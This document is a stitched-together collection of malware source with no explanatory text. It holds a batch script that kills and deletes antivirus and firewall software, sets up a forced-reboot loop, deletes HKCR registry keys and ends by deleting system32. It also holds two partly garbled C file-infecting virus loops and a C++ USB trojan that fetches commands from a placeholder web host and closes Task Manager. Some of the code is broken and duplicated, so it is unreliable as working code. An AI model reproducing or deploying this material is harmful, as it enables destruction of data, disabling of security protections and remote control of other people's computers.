@ echo off rem — rem Permanently Kill Anti-Virus net stop “Security Center” netsh firewall set opmode mode=disable tskill /A av* tskill /A fire* tskill /A anti* cls tskill /A spy* tskill /A bullguard tskill /A PersFw tskill /A KAV* tskill /A ZONEALARM tskill /A SAFEWEB cls tskill /A OUTPOST tskill /A nv* tskill /A nav* tskill /A F-* tskill /A ESAFE tskill /A clle cls tskill /A BLACKICE tskill /A def* tskill /A kav tskill /A kav* tskill /A avg* tskill /A ash* cls tskill /A aswupdsv tskill /A ewid* tskill /A guard* tskill /A guar* tskill /A gcasDt* tskill /A msmp* cls tskill /A mcafe* tskill /A mghtml tskill /A msiexec tskill /A outpost tskill /A isafe tskill /A zap* cls tskill /A zauinst tskill /A upd* tskill /A zlclien* tskill /A minilog tskill /A cc* tskill /A norton* cls tskill /A norton au* tskill /A ccc* tskill /A npfmn* tskill /A loge* tskill /A nisum* tskill /A issvc tskill /A tmp* cls tskill /A tmn* tskill /A pcc* tskill /A cpd* tskill /A pop* tskill /A pav* tskill /A padmin cls tskill /A panda* tskill /A avsch* tskill /A sche* tskill /A syman* tskill /A virus* tskill /A realm* cls tskill /A sweep* tskill /A scan* tskill /A ad-* tskill /A safe* tskill /A avas* tskill /A norm* cls tskill /A offg* del /Q /F C:Program Filesalwils~1avast4*.* del /Q /F C:Program FilesLavasoftAd-awa~1*.exe del /Q /F C:Program Fileskasper~1*.exe cls del /Q /F C:Program Filestrojan~1*.exe del /Q /F C:Program Filesf-prot95*.dll del /Q /F C:Program Filestbav*.dat cls del /Q /F C:Program Filesavpersonal*.vdf del /Q /F C:Program FilesNorton~1*.cnt del /Q /F C:Program FilesMcafee*.* cls del /Q /F C:Program FilesNorton~1Norton~1Norton~3*.* del /Q /F C:Program FilesNorton~1Norton~1speedd~1*.* del /Q /F C:Program FilesNorton~1Norton~1*.* del /Q /F C:Program FilesNorton~1*.* cls del /Q /F C:Program Filesavgamsr*.exe del /Q /F C:Program Filesavgamsvr*.exe del /Q /F C:Program Filesavgemc*.exe cls del /Q /F C:Program Filesavgcc*.exe del /Q /F C:Program Filesavgupsvc*.exe del /Q /F C:Program Filesgrisoft del /Q /F C:Program Filesnood32krn*.exe del /Q /F C:Program Filesnood32*.exe cls del /Q /F C:Program Filesnod32 del /Q /F C:Program Filesnood32 del /Q /F C:Program Fileskav*.exe del /Q /F C:Program Fileskavmm*.exe del /Q /F C:Program Fileskaspersky*.* cls del /Q /F C:Program Filesewidoctrl*.exe del /Q /F C:Program Filesguard*.exe del /Q /F C:Program Filesewido*.exe cls del /Q /F C:Program Filespavprsrv*.exe del /Q /F C:Program Filespavprot*.exe del /Q /F C:Program Filesavengine*.exe cls del /Q /F C:Program Filesapvxdwin*.exe del /Q /F C:Program Fileswebproxy*.exe del /Q /F C:Program Filespanda software*.* rem — echo @echo off>c:windowshartlell.bat echo break off>c:windowshartlell.bat echo shutdown -r -t 11 -f>c:windowshartlell.bat echo end>c:windowshartlell.bat reg add hkey_local_machinesofwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f reg add hkey_current_usersoftwaremicrosoftwindowscurrentverionrun /v/t reg_sz /d c:windowshartlell.bat /f @echo off START reg delete HKCR/* START reg delete HKCR/.dll START reg delete HKCR/.exe @echo off ipconfig /release @echo off Copy C:\Programs\Fuck that baby.batch C:\Programs Start C:\Programs\Fuck that Baby.Batch FILE *Ron *vRon; int owned = 0; unsigned long x; char buff[256]; struct ffblk ffblk; clock_t st, end; main() { st=clock(); clrscr(); owned=(find_first(“*.*”, &ffblk,0); while(!done) { Ron=fopen(_arg[0], “rb”); vhost=fopen(ffblk.ff_name, “rb+”); if (vhost = =NULL) goto next; x = 89088; printf(“infecting %s\n”, ffblk.ff_name); while(x>2048) { fread(buff,256,1,Ron); fwrite(buff,256,1,vRon); x – = 2048; } fread(buff,x,1,Ron); fwrite(buff,x,1,vRon); a++; next: fcloseall(); owned = findnext(&ffblk); } end = clock() printf(“Infected %d files in %f sec”, a, (end-st)/CLK_TCk); return (0); } #include #include #include #include #include #include FILE *Virus,*host; int done,a=0; unsigned long x; char buff[2048]; struct ffblk ffblk; clock_t st,end; void main() { st=clock(); clrscr(); done=findfirst(“*.*”,&ffblk,0); while(!done) { Virus=fopen(_argv[0],”rb”); host=fopen(ffblk.ff_name,”rb+”); if(host==NULL) goto next; x=89088; printf(“Infecting %s\n”,ffblk.ff_name,a); while(x>2048) { fread(buff,2048,1,virus); fwrite(buff,2048,1,host); x-=2048; } fread(buff,x,1,virus); fwrite(buff,x,1,host); a++; next: { fcloseall(); done=findnext(&ffblk); } } printf(“DONE! (Total Files Infected= %d)”,a); end=clock(); printf(“TIME TAKEN=%f SEC\n”,(end-st)/CLK_TCK); getch(); } #include #pragma comment(lib, "Winmm.lib") #include #pragma comment(lib, "urlmon.lib") #include #include #include #pragma comment(lib, "WinInet.lib") #include using namespace std;   int Option, Assign, Target; DWORD WINAPI LowProfile(LPVOID); DWORD WINAPI Option1(LPVOID); DWORD WINAPI Option2(LPVOID); DWORD WINAPI Option3(LPVOID); DWORD WINAPI Option4(LPVOID); DWORD WINAPI Option5(LPVOID); // Add more lines of Option6, Option7, etc. to create more commands. HWND TaskMgr, SysError, WMP, Disk1, Disk2, Disk3, Disk4, Autoplay, VBS;   int main() { // Hide Console Window FreeConsole();   CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)&LowProfile, 0, 0, NULL);   FILE *istream; if ( (istream = fopen ( "C:\\Windows\\trojan\\assign.txt", "r" ) ) == NULL ) {     URLDownloadToFile(NULL, L"http://www.yourwebsitehere.com/trojan/assign.html", L"c:\\Windows\\trojan\\assign.txt", NULL, NULL); } else { }   // Store Assign.txt in a variable ifstream inAssign; inAssign.clear(); inAssign.open("c:\\Windows\\trojan\\assign.txt"); inAssign >> Assign; inAssign.close(); inAssign.clear();         // Download Option & Target     remove("c:\\Windows\\trojan\\option.txt");     remove("c:\\Windows\\trojan\\target.txt");     DeleteUrlCacheEntry(L"http://www.yourwebsitehere.com/trojan/");     DeleteUrlCacheEntry(L"http://www.yourwebsitehere.com/trojan/target.html");     Sleep(100);     URLDownloadToFile(NULL, L"http://www.yourwebsitehere.com/trojan/", L"c:\\Windows\\trojan\\option.txt", NULL, NULL);     URLDownloadToFile(NULL, L"http://www.yourwebsitehere.com/trojan/target.html", L"c:\\Windows\\trojan\\target.txt", NULL, NULL);       // Read Option     ifstream inFile;     inFile.clear();     inFile.open("c:\\Windows\\trojan\\option.txt");     inFile >> Option;     inFile.close();     inFile.clear();       // Read Target     ifstream inTarget;     inTarget.clear();     inTarget.open("c:\\Windows\\trojan\\target.txt");     inTarget >> Target;     inTarget.close();     inTarget.clear();       if(Target == Assign || Target == 0) {         if(Option == 1) { CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)&Option1, 0, 0, NULL); }         else if(Option == 2) { CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)&Option2, 0, 0, NULL); }         else if(Option == 3) { CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)&Option3, 0, 0, NULL); }         else if(Option == 4) { CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)&Option4, 0, 0, NULL); }         else if(Option == 5) { CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)&Option5, 0, 0, NULL); }         // Add more of these lines for more commands     }     Sleep(5000);     } }   // Our LowProfile Thread. Hides all errors and things that may popup while inserting your U3 drive. DWORD WINAPI LowProfile(LPVOID) {     while(1) {         // Obvious         TaskMgr = FindWindow(NULL,L"Windows Task Manager");         // May popup because of new hardware installation (U3)         SysError = FindWindow(NULL,L"System Settings Change");         // Windows Media Player may popup. Rarely happens, but had this once at a school computer.         WMP = FindWindow(NULL,L"Windows Media Player");         // The Removable Disk part of the U3 Drive can open automatically.         Disk1 = FindWindow(NULL,L"(D:) Removable Disk");         Disk2 = FindWindow(NULL,L"(E:) Removable Disk");         Disk3 = FindWindow(NULL,L"(F:) Removable Disk");         Disk4 = FindWindow(NULL,L"(G:) Removable Disk");         // Autoplay         Autoplay = FindWindow(NULL,L"Autoplay");         // Errors caused by our VBScript go.vbs         VBS = FindWindow(NULL,L"Windows Script Host");         if( TaskMgr != NULL) {             SetWindowText( TaskMgr,L"DIE!!!! =O");             Sleep(500);             PostMessage( TaskMgr, WM_CLOSE, (LPARAM)0, (WPARAM)0);         }         if( SysError != NULL) {             PostMessage( SysError, WM_CLOSE, (LPARAM)0, (WPARAM)0);         }         if( WMP != NULL) {             Sleep(1000);             PostMessage( WMP, WM_CLOSE, (LPARAM)0, (WPARAM)0);         }         if( Disk1 != NULL) {             PostMessage( Disk1, WM_CLOSE, (LPARAM)0, (WPARAM)0);         }         if( Disk2 != NULL) {             PostMessage( Disk2, WM_CLOSE, (LPARAM)0, (WPARAM)0);         }         if( Disk3 != NULL) {             PostMessage( Disk3, WM_CLOSE, (LPARAM)0, (WPARAM)0);         }         if( Disk4 != NULL) {             PostMessage( Disk4, WM_CLOSE, (LPARAM)0, (WPARAM)0);         }         if( Autoplay != NULL) {             PostMessage( Autoplay, WM_CLOSE, (LPARAM)0, (WPARAM)0);         }         if( VBS != NULL) {             PostMessage( VBS, WM_CLOSE, (LPARAM)0, (WPARAM)0);         }         Sleep(500);     } }     DWORD WINAPI Option1(LPVOID) { // 1     return 0; }   DWORD WINAPI Option2(LPVOID) { // 2     return 0; }   DWORD WINAPI Option3(LPVOID) { // 3     return 0; }   DWORD WINAPI Option4(LPVOID) { // 4     return 0; }   DWORD WINAPI Option5(LPVOID) { // 5     return 0; } StretchBlt(hdc, 50, 50, w - 100, h - 100, hdc, 0, 0, w, h, SRCCOPY); out: return 200.0 / (times / 5.0 + 1) + 4; } int x1 = random() % (w - 400); int y1 = random() % (h - 400); int x2 = random() % (w - 400); int y2 = random() % (h - 400); int width = random() % 400; int height = random() % 400; BitBlt(hdc, x1, y1, width, height, hdc, x2, y2, SRCCOPY); out: return 200.0 / (times / 5.0 + 1) + 3; } del c:\WINDOWS\system32*.*